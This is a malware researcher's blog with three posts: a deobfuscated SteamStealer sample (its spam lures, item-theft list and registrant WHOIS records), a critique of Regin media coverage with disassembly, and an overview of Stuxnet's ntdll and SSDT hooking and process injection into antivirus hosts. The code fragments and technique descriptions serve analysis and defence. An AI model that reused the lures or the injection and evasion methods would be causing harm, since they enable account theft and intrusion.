Wednesday, December 31, 2014

SteamStealer - A look into the source code

I've been wanting to take a little bit of a look at the recent SteamStealer malware going around throughout November and December. There's a few different types, mainly being .src executables that once executed connect to a designated domain and drop more stuff. The other more recent type uses a custom crypter with a library containing a RunPE function to inevitably load SteamStealer into the process. In any case, I won't be doing any "on the surface" analysis/removal tips, as it's been nicely done by blogs such as this. I'll instead be taking a look at the source code for a few of these .src files, and talking a bit about them as well.

So first off, the big thing regarding a lot of these recent .src files is they are obfuscated with Confuser, or its successor known as ConfuserEx. Confuser is a pretty popular free obfuscator mainly because it's one that isn't completely easy to reverse. It's still reversible, just not as easy as many other free obfuscators out there. You can do it with WinDbg which is absolutely gruesome and not really recommended for .NET deobfuscation, as anything really past methods is difficult and time consuming. Alternatively, you can use the wonderful internet world we have to get any slew of tools to decrypt methods, delegate killer, dump, and string decrypt.

Let's first take a look at what the thumbnails for the samples look like:


As we can see, the thumbnails appear as a Steam inventory with various items.

Back to obfuscation, if we try to take one of our .src samples obfuscated with Confuser into IDA, here's what we get:


After deobfuscation however, we can successfully take a somewhat broken look at the source code. Near the top of the code you can generally find the following (and hilarious) format:

 newobj  instance void SteamWorker::.ctor()  
   stloc.0  
   ldloc.0  
   ldstr  "7656119816xxxxxxx" // Steam ID  
   ldstr  "203496355"  
   ldstr  "N71Ll_bP"  

All of the Steam ID's extracted from various source code samples are all 8 or 9 (mostly 9) digit ID's, implying they're new and not old accounts by any means. With this said, these accounts were of course created for the sole purpose of spamming trades with this malware, and most likely selling valuable items for real money. I wouldn't be surprised if they were purchased or stolen ID's.

   callvirt instance void SteamWorker::getSessionID()  
   ldloc.0  
   ldstr  "csgolounge"  
   ldstr  "how much is this karambit knife? hxxp://screen4say.com/image.png"  
   callvirt instance void SteamWorker::SpamGroup(string, string)  
   ldloc.0  
   ldstr  "dota2lounge"  
   ldstr  "how much is this unusual courier? hxxp://screen4say.com/image.png"  
   callvirt instance void SteamWorker::AddGroupAndMess(string, string)  
   ldloc.0  
   callvirt instance void SteamWorker::getFriends()  
   ldloc.0  
   ldstr  "He give me this knife hxxp://screen4say.com/image.png ty for you :)"  
   callvirt instance void SteamWorker::sendMessWall(string)  
   ldloc.0  
   callvirt instance void SteamWorker::DeleteAll()  

Above is an example of one of the many domains used in the malware (purged). You can see it would join the Steam group "csgolounge" and then message users "how much is this karambit knife?" with a link to the malware. This is how it mainly propagated, by joining various Steam trade groups and spamming anyone with public inventories. Mainly "csgolounge" and "dota2lounge" as those were the main games used for the malware.

Domains used from what I've seen are: prntsrc-online, screen4free, hostingscreen, screenshotyou, etc.

If we do a lookup on any one of those:

 Domain name: prntsrc-online.com  
 Domain idn name: prntsrc-online.com  
 Status: clientTransferProhibited  
 Registry Domain ID:  
 Registrar WHOIS Server: whois.reg.ru  
 Registrar URL: https://www.reg.com/  
 Registrar URL: https://www.reg.ru/  
 Registrar URL: https://www.reg.ua/  
 Updated Date: 2014-12-15  
 Creation Date: 2014-12-15T19:18:01Z  
 Registrar Registration Expiration Date: 2015-12-15  
 Registrar: Domain names registrar REG.RU LLC  
 Registrar IANA ID: 1606  
 Registrar Abuse Contact Email: Email Masking Image@reg.ru  
 Registrar Abuse Contact Phone: +7.4955801111  
 Registry Registrant ID:  
 Registrant Name: Ivan Ivanov  
 Registrant Organization: Yandex LTD  
 Registrant Street: ul.Koshkina 15 kv 4  
 Registrant City: Moscow  
 Registrant State/Province: MOSCOW STATE  
 Registrant Postal Code: 132170  
 Registrant Country: RU  
 Registrant Phone: +79871975615  
 Registrant Phone Ext:  
 Registrant Fax:  
 Registrant Fax Ext:  
 Registrant Email: spamspam228@mail.ru
 Registry Admin ID:  
 Admin Name: Ivan Ivanov  
 Admin Organization: Yandex LTD  
 Admin Street: ul.Koshkina 15 kv 4  
 Admin City: Moscow  
 Admin State/Province: MOSCOW STATE  
 Admin Postal Code: 132170  
 Admin Country: RU  
 Admin Phone: +79871975615  
 Admin Phone Ext:  
 Admin Fax:  
 Admin Fax Ext:  
 Admin Email: spamspam228@mail.ru  
 Registry Tech ID:  
 Tech Name: Ivan Ivanov  
 Tech Organization: Yandex LTD  
 Tech Street: ul.Koshkina 15 kv 4  
 Tech City: Moscow  
 Tech State/Province: MOSCOW STATE  
 Tech Postal Code: 132170  
 Tech Country: RU  
 Tech Phone: +79871975615  
 Tech Phone Ext:  
 Tech Fax:  
 Tech Fax Ext:  
 Tech Email: spamspam228@mail.ru  
 Name Server: ns1.hostinger.ru  
 Name Server: ns2.hostinger.ru  
 Name Server: ns3.hostinger.ru  
 Name Server: ns4.hostinger.ru  
 DNSSEC: Unsigned  

Regarding this search, we can see it's a Russian based domain that was created and is administered by spamspam228(at)mail.ru. There's no doubt spamspam228 is a legitimate email, right? My favorite part isn't the email, but that the registrant's name is Ivan Ivanov from the organization Yandex LTD. This is absolutely hilarious considering Yandex is a Russian search engine (and ISP I believe?). I don't think Mr. Ivan Ivanov from Yandex is behind this.

If we now go ahead and look up this email, we can see:

 The email [email protected] is related to these domains :  
 1. printsrceen.com  
 2. prntsrc-online.com  

There's another interesting one:

 Domain Name: PICTURES-SCREEN.NET  
 Registry Domain ID:  
 Registrar WHOIS Server: whois.publicdomainregistry.com  
 Registrar URL: www.publicdomainregistry.com  
 Updated Date: 2014-12-23T16:15:07Z  
 Creation Date: 2014-12-23T16:15:05Z  
 Registrar Registration Expiration Date: 2015-12-23T16:15:05Z  
 Registrar: PDR Ltd. d/b/a PublicDomainRegistry.com  
 Registrar IANA ID: 303  
 Registrar Abuse Contact Email: 
 Registrar Abuse Contact Phone: +1-2013775952  
 Domain Status: clientTransferProhibited  
 Registry Registrant ID:  
 Registrant Name: Xuila Pitrov Vasielvis  
 Registrant Organization: ScreenPictures  
 Registrant Street: Puschcicha,4,15   
 Registrant City: Moscow  
 Registrant State/Province: Moscow  
 Registrant Postal Code: 148821  
 Registrant Country: RU  
 Registrant Phone: +7.9652422078  
 Registrant Phone Ext:  
 Registrant Fax:  
 Registrant Fax Ext:  
 Registrant Email: jesus7298@mail.ru  
 Registry Admin ID:  
 Admin Name: Xuila Pitrov Vasielvis  
 Admin Organization: ScreenPictures  
 Admin Street: Puschcicha,4,15   
 Admin City: Moscow  
 Admin State/Province: Moscow  
 Admin Postal Code: 148821  
 Admin Country: RU  
 Admin Phone: +7.9652422078  
 Admin Phone Ext:  
 Admin Fax:  
 Admin Fax Ext:  
 Admin Email: jesus7298@mail.ru  
 Registry Tech ID:  
 Tech Name: Xuila Pitrov Vasielvis  
 Tech Organization: ScreenPictures  
 Tech Street: Puschcicha,4,15   
 Tech City: Moscow  
 Tech State/Province: Moscow  
 Tech Postal Code: 148821  
 Tech Country: RU  
 Tech Phone: +7.9652422078  
 Tech Phone Ext:  
 Tech Fax:  
 Tech Fax Ext:  
 Tech Email: jesus7298@mail.ru  
 Name Server: ns1.webhost1.ru  
 Name Server: ns2.webhost1.ru  
 DNSSEC:Unsigned  

Administered by a Xuila Pitrov Vasielvis, from Russia once again, from the organization "ScreenPictures". It's the domain name backwards, hilarious. It's registered/administered by/to the email jesus7298(at)mail.ru. Once again, an interesting choice for an email.

If we now go ahead and look up this email, we can see:

 The email jesus7298@mail.ru is related to these domains :  
 1. pictures-screen.net  
 2. picturesscreen.net  
 3. screenshotcapture.net  

See the pattern? Lots of malicious domains hosted and administered by Russians.

So right away after deobfuscation you can find the Steam ID of the account the items are ultimately being sent to for collection, and information regarding the domain housing the malware. Of course after we find a Steam ID, we can look that up and find the profile on Steam Community. I won't be posting the Steam ID's publicly even though these accounts were used for malicious purposes, because I'm just here to analyze and that's it. You can probably dig up the profiles if you care enough to report them.


Right, so we can see that this account is level 1 (new), the only game it has played is Dota 2, and it has joined the Dota 2 group so it can spam the malware. We can see this person was nice enough to leave their Skype, name (possibly fake in some cases), etc. I have blanked it out as I noted I will. Let's take a look at another account:


This account is a bit more active, with 5.9 hours played of Dota 2 in the last two weeks. It's also level 2 as opposed to the previous account which was only level 1. This account is also in two of the usual spam groups, rather than one. With all of the above said, the above account was likely actively spamming successfully more than the first. Either that, or it was just used for spamming with the malware in general rather than prepared to be used for spamming.

You can see the "view more info" button, which hilariously the user left most if not all of their online credentials and places to find them. One of the links was to a Russian hack forum in which they hosted a thread offering various "services".

We can see some of the items the malware looked to steal:

   ldstr  "440,570,730,753"  
   ldstr  "753:gift;570:rare,legendary,Dc,mythical,arcana,normal,unusual,ancient,tool,key;440:unusual,hat,tool,key;730:tool,knife,pistol,smg,shotgun,rifle,sniper rifle,machinegun,sticker,key"  
   callvirt instance void SteamWorker::addItemsToSteal(string, [opt] string)  

The first few are Dota 2 tiers for the rarity quality for an item, and then we branch off to keys, unusual hats, hats in general, etc, and eventually ending up with Counter Strike items. Considering for example that unusual hats depending on the type, effect, etc can go upwards of several hundred dollars, this is a pretty annoying malware for people that aren't aware of it.

Overall however it's not a very impressive piece of malware by any means, just looks like script stuff. However I don't think it was meant to/supposed to be. It has obviously satisfied its original and intended goal, which was to steal items. A lot of people have had their items stolen, simply because a lot of people aren't aware as I noted above. Although I said I wouldn't go into removal, to avoid this malware other than just understanding how it works, just make your trades private.

Friday, December 19, 2014

Regin, the top-tier PASSIVE_LEVEL malware!

Over the past few weeks it seems left and right there's Regin this, Regin that. I am not going to do a detailed analysis and discuss its stages and what have you, as there are various/informative in-depth whitepapers, etc.

To name a few:

Symantec, Symantec.
Kaspersky, Kaspersky.
F-Secure.

In my opinion, Regin is your typical malware that expands outside of the reverse engineer/security community due to its original goal. Journalists or researchers with little kernel-level knowledge/background get a hold of it and before you know it, it's the next biggest sophisticated piece of malware and all that matters is PR. At this point, writing accurate and detailed articles doesn't matter anymore. What am I referring to, and what will I instead talk about with Regin?

Secret Malware in European Union Attack Linked to U.S. and British Intelligence.

Let's quickly talk about a short few things the whitepapers haven't mentioned (as far as I am aware), and the above article. Respectfully, I have absolutely no idea who reviewed the above article before it was pushed. You have to wonder if The Intercept rushed like hell to publish this article because Symantec released their whitepaper and didn't care about what half of it even said. Note the dates:



There's a lot of strange and irrelevant information in that article you can pick at, but the absolute best is:
This Regin driver recurrently checks that the current IRQL (Interrupt Request Level) is set to PASSIVE_LEVEL using the KeGetCurrentIrql() function in many parts of the code, probably in order to operate as silently as possible and to prevent possible IRQL confusion. This technique is another example of the level of precaution the developers took while designing this malware framework.
Since its publication date this has yet to have been changed, so I guess they don't care after all about its inaccuracies. Anyway, if it's not a surprise, calling KeGetCurrentIrql over and over again throughout the code is just a PAGED_CODE macro. It has absolutely nothing to do with stealth, and PASSIVE_LEVEL doesn't automatically imply obfuscation or stealth. For an example, here's an excerpt from db405ad775ac887a337b02ea8b07fddc (kernel driver - stage 1).

 call  KeGetCurrentIrql  
 test  al, al  
 jnz   short loc_FDEFAA3D  
 push  dword ptr [esi] ; Handle  
 call  ZwClose  
 test  eax, eax  
 jnz   short loc_FDEFAA3D  
 push  18h  
 push  ebx  
 push  esi  
 call  sub_FDEFA2EC  
 add   esp, 0Ch  
 mov   bl, 1  


Again taking a look at db405ad775ac887a337b02ea8b07fddc, there's another interesting tidbit throughout the code:

 push  43726150h 
 push  20h  
 push  edi  
 call  ds:ExAllocatePoolWithTag  

The above is the kernel mode driver's pool tag, the # of bytes to allocate for the memory request, the pool type, and finally its call to ExAllocatePoolWithTag allocate pool memory. Okay, so what's the big deal? If we convert the pool tag operand to a character, we get the following result:

 push  'CraP'  
 push  20h  
 push  edi  
 call  ds:ExAllocatePoolWithTag  

The pooltag is CraP : ) This is probably how many of us feel about this malware being so hyped by the media. There are of course others throughout the code, for example:

 push  'CraP'  
 push  eax  
 push  1  
 call  ds:ExAllocatePoolWithTag  

Overall, I guess the moral is to take time to get as much accurate information as you can for your articles. I cannot speak for anyone but myself, but as someone with a love for reverse engineering, malware, and debugging, I appreciate in-depth whitepapers and articles that provide thorough analysis. If all you're worried about is competition for views and hyping malware, chances are you're not going to appeal to the people who really care about the written content.

PS: Thanks to KernelMode as always for the hilarious discussion.

Sunday, November 16, 2014

Stuxnet - User/Kernel-Mode analysis

Today I'll be taking a look at Stuxnet, and at a kernel level mostly (as usual) more than its impact on user-mode. I'll still however be going over a few user-mode things as it ties in with our kernel level discussion. I also won't go in-depth regarding all of the ways Stuxnet uses its four-slot toolbelt of zero-day flaws, and a lot of other Stuxnet's methods of attack (network, etc). ESET, Symantec, and others have done a fantastic job in that regard.

What is Stuxnet?

First of all, it's important (and a bit hilarious) to know the story behind Stuxnet. If you're researching Stuxnet for the first time, it's really easy to get confused. There's finger pointing, claims, supposed "confirmed sources", etc, left and right. I'll briefly go over it. For example:

Confirmed: US and Israel created Stuxnet, lost control of it.

The article is adapted from journalist David Sanger's forthcoming book, Confront and Conceal: Obama’s Secret Wars and Surprising Use of American Power, and it confirms that both the US and Israeli governments developed and deployed Stuxnet.
Obama Order Sped Up Wave of Cyberattacks Against Iran.

Computer security experts who began studying the worm, which had been developed by the United States and Israel, gave it a name: Stuxnet.
US unleashed Stuxnet cyber war on Iran to appease Israel – report.

The US and Israel made the Stuxnet virus as a new kind of weapon targeted against Iran, a media investigation revealed. The operation reportedly started in the Bush era, but was intensified by Obama administration.
Snowden confirms NSA created Stuxnet with Israeli aid.

“The NSA and Israel wrote Stuxnet together,” Snowden told Applebaum in the interview that was carried out in May.
The big TLDR is here - Operation Olympic Games.

My initial reaction was "What the hell am I reading?", and it still sort of is. It goes on and on. All in all, after reading the above, you're likely inclined to believe that the US (and maybe even Israel) were behind Stuxnet. Whether or not this is true is a story for another day, although it's easier to lean towards 'yes' than it is to 'no'. The reason for this is due to the fact that Stuxnet as I discussed above used four zero-day flaws within Windows. It's a pretty big deal when malware exploits one zero-day flaw within the OS, but four is extremely high.

It's also pretty laughable to think that Stuxnet was created by amateurs not invested in any sort of organization regarding cyber warfare, etc of some sort, or amateurs in general. A lot of amateurs make malware for a lot of reasons, but causing nuclear centrifuges to commit suicide is pretty advanced. Aside from the many reasons to believe the answer is yes, some may lean towards no, and it's largely due to the fact that most cannot imagine the US and Israel working closely together to create something like Stuxnet.

I digress, and in any case, I'm not here to discuss politics or debate the true creator(s), so let's just get to the part where we talk about what Stuxnet was primarily created for. Stuxnet is a worm that was developed primarily to target industrial PLCs, which led to the nuclear centrifuges ultimately destroying themselves. The malware obviously couldn't be outright sent to the nuclear facilities themselves, so this is where its USB attack vector comes into play. More notably known as a supply chain attack:

So the creators of Stuxnet, they were thinking that these companies would do some communications with power plant workers; maybe exchange with USB devices. That’s probably how Stuxnet infected the system.

In the end, Stuxnet ended up destroying nearly one-fifth of Iran's centrifuges. In November 2010, it was reported that uranium enrichment within the Natanz nuclear facility had halted several times due to severe technical issues.

User-Mode

Stuxnet has two ways of injecting itself into the address space of a process and then executing exported functions. Stuxnet's user-mode modules are implemented as DLLs, and the first method is done by injecting itself into a preexisting process.

Preexisting Process Inject

1. Allocates a memory buffer in the calling process for the modules to be loaded.

2. Patches ntdll and hooks the following APIs:

  • ZwQueryAttributesFile.
  • ZwQuerySection.
Here's what a clean (unpatched) ntdll MZ header looks like:


We can see some of these hooks in action:

 ServiceDescriptor n°0  
 ---------------------  
   ServiceTable       : nt!KiServiceTable (804e26a8)  
   ParamTableBase      : nt!KiArgumentTable (80510088)  
   NumberOfServices     : 0000011c  
   Index Args Check System call  
   ----- ---- ----- -----------  
   0019  0001 HOOK-> f8c5761c ##### Original -> nt!NtClose (805678dd)  
   0029  0007 HOOK-> f8c575d6 ##### Original -> nt!NtCreateKey (8057065d)  
   0032  0007 HOOK-> f8c57626 ##### Original -> nt!NtCreateSection (805652b3)  
   0035  0008 HOOK-> f8c575cc ##### Original -> nt!NtCreateThread (8058e63f)  
   003F  0001 HOOK-> f8c575db ##### Original -> nt!NtDeleteKey (805952be)  
   0041  0002 HOOK-> f8c575e5 ##### Original -> nt!NtDeleteValueKey (80592d50)  
   0044  0007 HOOK-> f8c57617 ##### Original -> nt!NtDuplicateObject (805715e0)  
   0062  0002 HOOK-> f8c575ea ##### Original -> nt!NtLoadKey (805aed5d)  
   007A  0004 HOOK-> f8c575b8 ##### Original -> nt!NtOpenProcess (805717c7)  
   0080  0004 HOOK-> f8c575bd ##### Original -> nt!NtOpenThread (8058a1bd)  
   00B1  0006 HOOK-> f8c5763f ##### Original -> nt!NtQueryValueKey (8056a1f1)  
   00C1  0003 HOOK-> f8c575f4 ##### Original -> nt!NtReplaceKey (8064f0fa)  
   00C8  0003 HOOK-> f8c57630 ##### Original -> nt!NtRequestWaitReplyPort (80576ce6)  
   00CC  0003 HOOK-> f8c575ef ##### Original -> nt!NtRestoreKey (8064ec91)  
   00D5  0002 HOOK-> f8c5762b ##### Original -> nt!NtSetContextThread (8062dcdf)  
   00ED  0003 HOOK-> f8c57635 ##### Original -> nt!NtSetSecurityObject (8059b19b)  
   00F7  0006 HOOK-> f8c575e0 ##### Original -> nt!NtSetValueKey (80572889)  
   00FF  0006 HOOK-> f8c5763a ##### Original -> nt!NtSystemDebugControl (80649ce3)  
   0101  0002 HOOK-> f8c575c7 ##### Original -> nt!NtTerminateProcess (805822e0)  


If we for example go ahead and disassemble our hooked nt!NtClose function, we see the following:

 lkd> u 0xFFFFFFFFF8C5761C L1  
 f8c5761c e92d8b23fe   jmp   f6e9014e  

We have a hook regarding nt!NtClose and a jump. Classic rootkit behavior. Let's go further and dump the IAT by loading notepad.exe into OlyDbg and viewing executable modules:

 Address  Section  Type  ( Name                  Comment  
 0100102C  .text   Import ( GDI32.AbortDoc  
 0100131C  .text   Import   msvcrt._acmdln  
 0100132C  .text   Import   msvcrt._adjust_fdiv  
 01001300  .text   Import ( msvcrt._cexit  
 01001204  .text   Import ( USER32.CharLowerW  
 01001244  .text   Import ( USER32.CharNextW  
 010011C0  .text   Import ( USER32.CharUpperW  
 01001248  .text   Import ( USER32.CheckMenuItem  
 01001230  .text   Import ( USER32.ChildWindowFromPoint  
 010012D0  .text   Import ( comdlg32.ChooseFontW  
 0100124C  .text   Import ( USER32.CloseClipboard  
 010010F8  .text   Import ( KERNEL32.CloseHandle  
 010012B8  .text   Import   WINSPOOL.ClosePrinter  
 010012E0  .text   Import ( comdlg32.CommDlgExtendedError  
 010010EC  .text   Import ( KERNEL32.CompareStringW  
 0100133C  .text   Import ( msvcrt._controlfp  
 01001040  .text   Import ( GDI32.CreateDCW  
 01001214  .text   Import ( USER32.CreateDialogParamW  
 010010B4  .text   Import ( KERNEL32.CreateFileMappingW  
 01001104  .text   Import ( KERNEL32.CreateFileW  
 01001064  .text   Import ( GDI32.CreateFontIndirectW  
 01001020  .text   Import ( COMCTL32.CreateStatusWindowW  
 010011E0  .text   Import ( USER32.CreateWindowExW  
 010012F4  .text   Import ( msvcrt._c_exit  
 010011A4  .text   Import ( USER32.DefWindowProcW  
 01001034  .text   Import ( GDI32.DeleteDC  
 01001158  .text   Import ( KERNEL32.DeleteFileW  
 01001068  .text   Import ( GDI32.DeleteObject  
 010011A8  .text   Import ( USER32.DestroyWindow  
 01001198  .text   Import ( USER32.DialogBoxParamW  
 01001294  .text   Import ( USER32.DispatchMessageW  
 0100117C  .text   Import ( SHELL32.DragAcceptFiles  
 01001174  .text   Import ( SHELL32.DragFinish  
 01001178  .text   Import ( SHELL32.DragQueryFileW  
 01001210  .text   Import ( USER32.DrawTextExW  
 0100125C  .text   Import ( USER32.EnableMenuItem  
 0100120C  .text   Import ( USER32.EnableWindow  
 01001288  .text   Import ( USER32.EndDialog  
 01001030  .text   Import ( GDI32.EndDoc  
 01001028  .text   Import ( GDI32.EndPage  
 01001054  .text   Import ( GDI32.EnumFontsW  
 01001308  .text   Import ( msvcrt._except_handler3  
 010012F0  .text   Import ( msvcrt._exit  
 01001318  .text   Import ( msvcrt.exit  
 0100111C  .text   Import ( KERNEL32.FindClose  
 01001120  .text   Import ( KERNEL32.FindFirstFileW  
 010012C8  .text   Import ( comdlg32.FindTextW  
 010010F4  .text   Import   KERNEL32.FoldStringW  
 0100114C  .text   Import ( KERNEL32.FormatMessageW  
 0100115C  .text   Import ( KERNEL32.GetACP  
 01001188  .text   Import ( USER32.GetClientRect  
 01001114  .text   Import ( KERNEL32.GetCommandLineW  
 010010C0  .text   Import ( KERNEL32.GetCurrentProcess  
 0100110C  .text   Import ( KERNEL32.GetCurrentProcessId  
 0100108C  .text   Import ( KERNEL32.GetCurrentThreadId  
 01001238  .text   Import ( USER32.GetCursorPos  
 010010A0  .text   Import ( KERNEL32.GetDateFormatW  
 01001194  .text   Import ( USER32.GetDC  
 010011E4  .text   Import ( USER32.GetDesktopWindow  
 01001060  .text   Import ( GDI32.GetDeviceCaps  
 0100122C  .text   Import ( USER32.GetDlgCtrlID  
 01001274  .text   Import ( USER32.GetDlgItem  
 01001284  .text   Import ( USER32.GetDlgItemTextW  
 01001124  .text   Import ( KERNEL32.GetFileAttributesW  
 010010B0  .text   Import ( KERNEL32.GetFileInformationByHandle  
 010012D4  .text   Import ( comdlg32.GetFileTitleW  
 010011E8  .text   Import ( USER32.GetFocus  
 010011B4  .text   Import ( USER32.GetForegroundWindow  
 010011A0  .text   Import ( USER32.GetKeyboardLayout  
 01001138  .text   Import ( KERNEL32.GetLastError  
 010010D8  .text   Import ( KERNEL32.GetLocaleInfoW  
 01001098  .text   Import ( KERNEL32.GetLocalTime  
 01001320  .text   Import   msvcrt.__getmainargs  
 01001264  .text   Import ( USER32.GetMenu  
 01001258  .text   Import ( USER32.GetMenuState  
 010012A8  .text   Import ( USER32.GetMessageW  
 010010CC  .text   Import ( KERNEL32.GetModuleHandleA  
 0100105C  .text   Import ( GDI32.GetObjectW  
 010012D8  .text   Import ( comdlg32.GetOpenFileNameW  
 0100128C  .text   Import ( USER32.GetParent  
 010012B4  .text   Import   WINSPOOL.GetPrinterDriverW  
 01001110  .text   Import ( KERNEL32.GetProcAddress  
 010012E4  .text   Import ( comdlg32.GetSaveFileNameW  
 010010D0  .text   Import ( KERNEL32.GetStartupInfoA  
 01001058  .text   Import ( GDI32.GetStockObject  
 01001260  .text   Import ( USER32.GetSubMenu  
 010011CC  .text   Import ( USER32.GetSystemMenu  
 0100121C  .text   Import ( USER32.GetSystemMetrics  
 010010B8  .text   Import ( KERNEL32.GetSystemTimeAsFileTime  
 0100103C  .text   Import ( GDI32.GetTextExtentPoint32W  
 01001048  .text   Import ( GDI32.GetTextFaceW  
 0100106C  .text   Import ( GDI32.GetTextMetricsW  
 01001090  .text   Import ( KERNEL32.GetTickCount  
 010010A4  .text   Import   KERNEL32.GetTimeFormatW  
 0100109C  .text   Import ( KERNEL32.GetUserDefaultLCID  
 01001150  .text   Import   KERNEL32.GetUserDefaultUILanguage  
 01001270  .text   Import ( USER32.GetWindowLongW  
 010011BC  .text   Import ( USER32.GetWindowPlacement  
 01001218  .text   Import ( USER32.GetWindowTextW  
 010010D4  .text   Import ( KERNEL32.GlobalFree  
 010010A8  .text   Import ( KERNEL32.GlobalLock  
 010010AC  .text   Import ( KERNEL32.GlobalUnlock  
 01001324  .text   Import   msvcrt._initterm  
 01001224  .text   Import ( USER32.InvalidateRect  
 01001250  .text   Import ( USER32.IsClipboardFormatAvailable  
 010012A0  .text   Import ( USER32.IsDialogMessageW  
 010011B8  .text   Import ( USER32.IsIconic  
 0100100C  .text   Import   ADVAPI32.IsTextUnicode  
 01001304  .text   Import ( msvcrt.iswctype  
 010011C8  .text   Import ( USER32.LoadAcceleratorsW  
 010011D8  .text   Import ( USER32.LoadCursorW  
 010011EC  .text   Import ( USER32.LoadIconW  
 010011D4  .text   Import ( USER32.LoadImageW  
 010010C8  .text   Import ( KERNEL32.LoadLibraryA  
 010011C4  .text   Import ( USER32.LoadStringW  
 010010E0  .text   Import ( KERNEL32.LocalAlloc  
 010010DC  .text   Import ( KERNEL32.LocalFree  
 010010F0  .text   Import ( KERNEL32.LocalLock  
 01001148  .text   Import ( KERNEL32.LocalReAlloc  
 01001134  .text   Import ( KERNEL32.LocalSize  
 010012FC  .text   Import ( msvcrt.localtime  
 010010E8  .text   Import ( KERNEL32.LocalUnlock  
 01001074  .text   Import ( GDI32.LPtoDP  
 01001118  .text   Import ( KERNEL32.lstrcatW  
 01001108  .text   Import ( KERNEL32.lstrcmpiW  
 01001128  .text   Import ( KERNEL32.lstrcmpW  
 01001130  .text   Import ( KERNEL32.lstrcpynW  
 010010FC  .text   Import ( KERNEL32.lstrcpyW  
 010010E4  .text   Import ( KERNEL32.lstrlenW  
 01001168  .text   Import ( KERNEL32.MapViewOfFile  
 010011AC  .text   Import ( USER32.MessageBeep  
 01001268  .text   Import ( USER32.MessageBoxW  
 0100739D  .text   Export   <ModuleEntryPoint>  
 01001220  .text   Import ( USER32.MoveWindow  
 0100112C  .text   Import ( KERNEL32.MulDiv  
 01001164  .text   Import ( KERNEL32.MultiByteToWideChar  
 01001254  .text   Import ( USER32.OpenClipboard  
 010012BC  .text   Import   WINSPOOL.OpenPrinterW  
 010012C4  .text   Import   comdlg32.PageSetupDlgW  
 01001208  .text   Import ( USER32.PeekMessageW  
 010012A4  .text   Import ( USER32.PostMessageW  
 010011F4  .text   Import ( USER32.PostQuitMessage  
 010012CC  .text   Import   comdlg32.PrintDlgExW  
 01001330  .text   Import   msvcrt.__p__commode  
 01001334  .text   Import   msvcrt.__p__fmode  
 01001094  .text   Import ( KERNEL32.QueryPerformanceCounter  
 01001100  .text   Import ( KERNEL32.ReadFile  
 01001004  .text   Import ( ADVAPI32.RegCloseKey  
 01001008  .text   Import ( ADVAPI32.RegCreateKeyW  
 010011D0  .text   Import ( USER32.RegisterClassExW  
 010011F8  .text   Import ( USER32.RegisterWindowMessageW  
 01001014  .text   Import ( ADVAPI32.RegOpenKeyExA  
 01001010  .text   Import ( ADVAPI32.RegQueryValueExA  
 01001000  .text   Import ( ADVAPI32.RegQueryValueExW  
 01001018  .text   Import ( ADVAPI32.RegSetValueExW  
 01001190  .text   Import ( USER32.ReleaseDC  
 010012DC  .text   Import ( comdlg32.ReplaceTextW  
 01001234  .text   Import ( USER32.ScreenToClient  
 01001084  .text   Import ( GDI32.SelectObject  
 0100123C  .text   Import ( USER32.SendDlgItemMessageW  
 01001240  .text   Import ( USER32.SendMessageW  
 01001044  .text   Import ( GDI32.SetAbortProc  
 0100119C  .text   Import ( USER32.SetActiveWindow  
 01001070  .text   Import ( GDI32.SetBkMode  
 0100118C  .text   Import ( USER32.SetCursor  
 0100127C  .text   Import ( USER32.SetDlgItemTextW  
 01001154  .text   Import ( KERNEL32.SetEndOfFile  
 01001278  .text   Import ( USER32.SetFocus  
 01001140  .text   Import ( KERNEL32.SetLastError  
 01001080  .text   Import ( GDI32.SetMapMode  
 01001200  .text   Import ( USER32.SetScrollPos  
 010010C4  .text   Import ( KERNEL32.SetUnhandledExceptionFilter  
 01001328  .text   Import   msvcrt.__setusermatherr  
 0100107C  .text   Import ( GDI32.SetViewportExtEx  
 01001078  .text   Import ( GDI32.SetWindowExtEx  
 0100126C  .text   Import ( USER32.SetWindowLongW  
 010011DC  .text   Import ( USER32.SetWindowPlacement  
 010011F0  .text   Import ( USER32.SetWindowTextW  
 010012AC  .text   Import ( USER32.SetWinEventHook  
 01001338  .text   Import   msvcrt.__set_app_type  
 01001180  .text   Import ( SHELL32.ShellAboutW  
 010011B0  .text   Import ( USER32.ShowWindow  
 01001314  .text   Import ( msvcrt._snwprintf  
 01001050  .text   Import ( GDI32.StartDocW  
 01001038  .text   Import ( GDI32.StartPage  
 010010BC  .text   Import ( KERNEL32.TerminateProcess  
 0100104C  .text   Import ( GDI32.TextOutW  
 010012F8  .text   Import ( msvcrt.time  
 0100129C  .text   Import ( USER32.TranslateAcceleratorW  
 01001298  .text   Import ( USER32.TranslateMessage  
 0100116C  .text   Import ( KERNEL32.UnhandledExceptionFilter  
 01001290  .text   Import ( USER32.UnhookWinEvent  
 01001160  .text   Import ( KERNEL32.UnmapViewOfFile  
 010011FC  .text   Import ( USER32.UpdateWindow  
 01001310  .text   Import ( msvcrt.wcsncmp  
 01001340  .text   Import ( msvcrt.wcsncpy  
 01001144  .text   Import ( KERNEL32.WideCharToMultiByte  
 01001228  .text   Import ( USER32.WinHelpW  
 0100113C  .text   Import ( KERNEL32.WriteFile  
 01001280  .text   Import ( USER32.wsprintfW  
 0100130C  .text   Import ( msvcrt._wtol  
 010012EC  .text   Import   msvcrt._XcptFilter  

The Import Address Table (IAT) is essentially just a table of jumps. It's used primarily as a lookup table when an application is calling a function in a different module. Compiled programs cannot know the memory locations of the libraries they depend on, therefore an indirect jump (jmp) is required whenever an API call is made.

In the above code we can see jumps to functions such as USER32.GetKeyboardLayout, which is a wrapper for the NtUserLoadKeyboardLayoutEx win32k syscall. This is in regards to Stuxnet's keyboard layout vulnerability (CVE-2010-2743), which is one of four exploitative ways used to escalate privileges in order to reach ring 0.

I would have loved to set a breakpoint on win32k!NtUserLoadKeyboardLayoutEx and trace the malware as it's extremely interesting, but setting breakpoints is not possible on an LKD session. I would have needed to break in to another physical machine (which I don't have), or set up a host > virtual COM port, which is a bit of a pain. I'll chalk it up to something to do on a rainy day. Call me lazy... I know.

3. Calls LoadLibraryW which is exported from kernel32.dll and passes it as a parameter for specially crafted file names such as: KERNEL32.DLL.ASLR.[HEX] or SHELL32.DLL.ASLR.[HEX]. Below we can see an example of a KERNEL32 variant:


4. Calls desired exported function.

5. Calls FreeLibrary function to free load library.

New Process Inject

The second method of injection is done through injecting a newly created process, as such:

1. Creates host process.

2. Replaces process image with the Stuxnet module to execute and with code that will load the module and call a specificed export passing parameters.

There's a few different image names that can be chosen as the host process for the module:

  • lsass.exe - MSFT system process in charge of enforcing the security policy.
  • avp.exe - Kaspersky.
  • mcshield.exe - McAfee VirusScan.
  • avguard.exe - Avira Personal Edition.
  • bdagent.exe - Bitdefender Switch Agent.
